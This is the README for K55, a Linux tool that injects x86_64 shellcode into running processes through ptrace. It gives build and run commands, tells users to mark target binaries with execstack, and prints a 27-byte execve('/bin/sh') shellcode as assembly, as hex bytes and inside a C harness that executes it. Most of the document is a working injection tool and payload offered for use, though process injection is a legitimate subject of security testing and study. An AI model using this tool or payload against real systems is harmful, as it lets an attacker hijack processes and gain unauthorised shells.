(pronounced: "kay fifty-five")
The K55 payload injection tool is used for injecting x86_64 shellcode payloads into running processes. The utility was developed using modern C++11 techniques as well as some traditional C linux functions like ptrace()
. The shellcode spawned in the target process is 27 bytes and it executes /bin/sh (spawns a bash shell) within the target's address space. In the future, I will allow users to input there own shellcode via command line arguments.
git clone https://github.com/josh0xA/K55.git
cd K55
chmod +x build-install.sh
./build-install.sh
Usage: ./K55 <process-name>
- process-name can be any linux process with
r-xp
orexecstack
permissions.
Test 1) In one terminal (K55/ Directory), run: ./k55_example_process/k55_test_process
Test 2) In another terminal, run the injector: sudo ./K55 k55_test_process
- A shell is spawned in k55_test_process when the K55 shellcode injector is ran (as root).
Obviously, ptrace(PTRACE_POKETEXT...)
calls are not the most disguised. So, some applications can limit the effect of K55. Although, for security testing, make sure to turn on execstack
for your target applications. For example if I'm testing on gdb, before I would inject, I would run the following: sudo execstack -s /usr/bin/gdb
. Install execstack from your distrobutions package manager. For Arch Linux users, you can find execstack on the AUR.
Note: The following is a demonstration. The payload string is already hardcoded into K55.
Assembly Implementation of The Payload (Cited from shell-storm (redirect))
main:
xor eax, eax
mov rbx, 0xFF978CD091969DD1
neg rbx
push rbx
push rsp
pop rdi
cdq
push rdx
push rdi
push rsp
pop rsi
mov al, 0x3b
syscall
#include <stdio.h>
#include <string.h>
// Shellcode breakdown of the assembly code.
char code[] = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";
int main()
{
printf("len:%d bytes\n", strlen(code));
(*(void(*)()) code)();
return 0;
}
http://shell-storm.org/shellcode/files/shellcode-806.php
https://0x00sec.org/t/linux-infecting-running-processes/1097
MIT License
Copyright (c) Josh Schiavone